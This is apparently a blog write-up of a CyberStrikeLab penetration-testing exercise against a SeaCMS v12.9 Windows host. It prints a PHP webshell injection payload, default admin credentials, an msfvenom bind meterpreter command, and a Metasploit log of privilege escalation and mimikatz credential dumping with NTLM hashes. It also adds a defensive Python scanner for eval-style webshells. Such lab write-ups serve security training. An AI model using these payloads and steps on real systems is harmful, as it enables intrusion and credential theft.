CyberStrikeLab PT

PT-1

Entry point: 10.0.0.68

Information gathering

Once in, we find a SeaCMS (海洋CMS) install. Requesting /data/admin/ver.txt returns the version number, v12.9. Exploiting this version requires being logged in to the admin back end, and unexpectedly the back end lives under the /cslab directory with the credentials cslab/cslab. After logging in, open the member message notification (会员消息通知) setting: its value is written into a PHP file, so a one-line webshell can be injected there.

flag1

1";@eval($_POST[cmd]);;//

In that payload the leading 1" closes the double-quoted string the setting is stored in, @eval($_POST[cmd]); is the webshell, and the trailing // comments out the remainder of the line. After saving it, the shell is reachable at http://10.0.0.68/data/admin/notify.php; connect with AntSword (蚁剑) using cmd as the parameter name, and flag1 is in the root directory.

go-flag{a3aecfd5-17db-52a0-ac1d-3a32124b04f4}
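The one-liner above ends up inside a .php file that the CMS writes from a configuration setting, so the practical check after an engagement like this (or during incident response on a SeaCMS host) is to scan the web root for PHP that hands request parameters to eval or a similar sink. The scanner below is an added example, not SeaCMS code and not part of the original writeup; the notify.php contents it scans are a constructed reconstruction of what a double-quoted setting looks like after the breakout payload, and the file layout is assumed.

```python
"""Scan PHP sources for request data flowing into code/command execution sinks."""
from __future__ import annotations

import re
from dataclasses import dataclass

# PHP functions that execute code or commands when handed attacker-controlled input.
SINKS = r"(?:eval|assert|system|passthru|shell_exec|exec|popen|proc_open|create_function)"
# Superglobals that carry request data; the one-liner in this writeup reads $_POST[cmd].
SOURCES = r"\$_(?:POST|GET|REQUEST|COOKIE|SERVER)\s*\["
# A sink whose argument list (up to the next ';') contains a request parameter.
WEBSHELL_RE = re.compile(rf"@?\b{SINKS}\s*\(\s*[^;]*?{SOURCES}", re.IGNORECASE)


@dataclass
class Finding:
    path: str
    line_no: int
    snippet: str


def scan_php(path: str, source: str) -> list[Finding]:
    """Return one Finding per line that passes request data into an execution sink."""
    return [
        Finding(path, no, line.strip())
        for no, line in enumerate(source.splitlines(), start=1)
        if WEBSHELL_RE.search(line)
    ]


def scan_tree(files: dict[str, str]) -> list[Finding]:
    """Scan a {path: contents} mapping; on a real host build it by walking the web root."""
    findings: list[Finding] = []
    for path in sorted(files):
        if path.lower().endswith((".php", ".phtml", ".inc")):
            findings.extend(scan_php(path, files[path]))
    return findings


# Constructed samples. notify.php is a reconstruction (assumed layout, not SeaCMS's
# real file) of a setting written verbatim inside a double-quoted PHP string: the
# payload's leading 1" closes the string, @eval($_POST[cmd]); runs, and // swallows
# the rest of the line.
SAMPLE_FILES = {
    "data/admin/notify.php": '<?php\n$notify="1";@eval($_POST[cmd]);;//";\n',
    "data/admin/ver.txt": "12.9\n",                                      # not PHP, skipped
    "data/config.php": "<?php\n$db_host='127.0.0.1';\n$notify=\"1\";\n",  # benign setting
    "upload/x.php": "<?php @assert($_REQUEST['a']);\n",                 # another common one-liner
}

if __name__ == "__main__":
    for f in scan_tree(SAMPLE_FILES):
        print(f"{f.path}:{f.line_no}: {f.snippet}")
```

Running it reports the notify.php line and the assert variant while the clean config is ignored. The application-side fix is never to splice a setting into PHP source: emit it with var_export(), or keep settings in a non-executable store such as JSON or the database and read them at runtime.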

flag2

The NTLM hash of the Administrator user
Command execution shows the target is a Windows host. Generate a bind payload with msfvenom -p windows/x64/meterpreter/bind_tcp LHOST=0.0.0.0 LPORT=4444 -f exe > shell.exe (a bind payload listens on the target, so only LPORT matters and LHOST is ignored), upload shell.exe to the target and run it, then connect to it from msf with exploit/multi/handler. Because the connection goes from attacker to target, port 4444 on 10.0.0.68 has to be reachable from the attacking host, which is why the handler takes RHOST rather than opening a local listener. Once the session is up, the remaining work is privilege escalation and dumping the hashes.

┌──(root㉿kali-plus)-[~]
└─# msfconsole                                                                               
Metasploit tip: Set the current module's RHOSTS with database values using 
hosts -R or services -R
                                                  
IIIIII    dTb.dTb        _.---._
  II     4'  v  'B   .'"".'/|\`.""'.
  II     6.     .P  :  .' / | \ `.  :
  II     'T;. .;P'  '.'  /  |  \  `.'
  II      'T; ;P'    `. /   |   \ .'
IIIIII     'YvP'       `-.__|__.-'

I love shells --egypt


       =[ metasploit v6.4.45-dev                          ]
+ -- --=[ 2490 exploits - 1281 auxiliary - 431 post       ]
+ -- --=[ 1466 payloads - 49 encoders - 13 nops           ]
+ -- --=[ 9 evasion                                       ]

Metasploit Documentation: https://docs.metasploit.com/

msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/bind_tcp
payload => windows/x64/meterpreter/bind_tcp
msf6 exploit(multi/handler) > set rhost 10.0.0.68
rhost => 10.0.0.68
msf6 exploit(multi/handler) > set lport 4444
lport => 4444
msf6 exploit(multi/handler) > run
[*] Started bind TCP handler against 10.0.0.68:4444
shell
^C[-] Exploit failed [user-interrupt]: Interrupt 
[-] run: Interrupted
msf6 exploit(multi/handler) > show options

Payload options (windows/x64/meterpreter/bind_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LPORT     4444             yes       The listen port
   RHOST     10.0.0.68        no        The target address


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target



View the full module info with the info, or info -d command.

msf6 exploit(multi/handler) > run
[*] Started bind TCP handler against 10.0.0.68:4444
[*] Sending stage (203846 bytes) to 10.0.0.68
[*] Meterpreter session 1 opened (172.16.233.2:45539 -> 10.0.0.68:4444) at 2025-04-25 21:08:27 +0800

meterpreter > shell
^C[-] shell: Interrupted
meterpreter > ls
[-] Send timed out. Timeout currently 15 seconds, you can configure this with sessions --interact <id> --timeout <value>
meterpreter > getsystem
[-] Send timed out. Timeout currently 15 seconds, you can configure this with sessions --interact <id> --timeout <value>
meterpreter > getsystem
...got system via technique 5 (Named Pipe Impersonation (PrintSpooler variant)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:cad8ef0c410c9709cea512052756ce5a:::
ApacheUser:1000:aad3b435b51404eeaad3b435b51404ee:01ef84bcd8079831f0966ac49ae9c0e6:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
meterpreter > load kiwi
Loading extension kiwi...
  .#####.   mimikatz 2.2.0 20191125 (x64/windows)
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'        Vincent LE TOUX            ( vincent.letoux@gmail.com )
  '#####'         > http://pingcastle.com / http://mysmartlogon.com  ***/

Success.
meterpreter > creds_all
[+] Running as SYSTEM
[*] Retrieving all credentials
msv credentials
===============

Username       Domain           NTLM                              SHA1
--------       ------           ----                              ----
Administrator  WIN-S4KAS0ERCGQ  cad8ef0c410c9709cea512052756ce5a  947e1029f3fc1ce2f1f6592a1e55844dd3152ea2

wdigest credentials
===================

Username          Domain           Password
--------          ------           --------
(null)            (null)           (null)
Administrator     WIN-S4KAS0ERCGQ  (null)
WIN-S4KAS0ERCGQ$  WORKGROUP        (null)

kerberos credentials
====================

Username          Domain           Password
--------          ------           --------
(null)            (null)           (null)
Administrator     WIN-S4KAS0ERCGQ  (null)
win-s4kas0ercgq$  WORKGROUP        (null)

Finally we obtain cad8ef0c410c9709cea512052756ce5a, the Administrator NT hash: it is the fourth field of the hashdump line and the NTLM column of kiwi's msv output, and the two agree.

posted @ 2025-04-26 01:40 L4g0M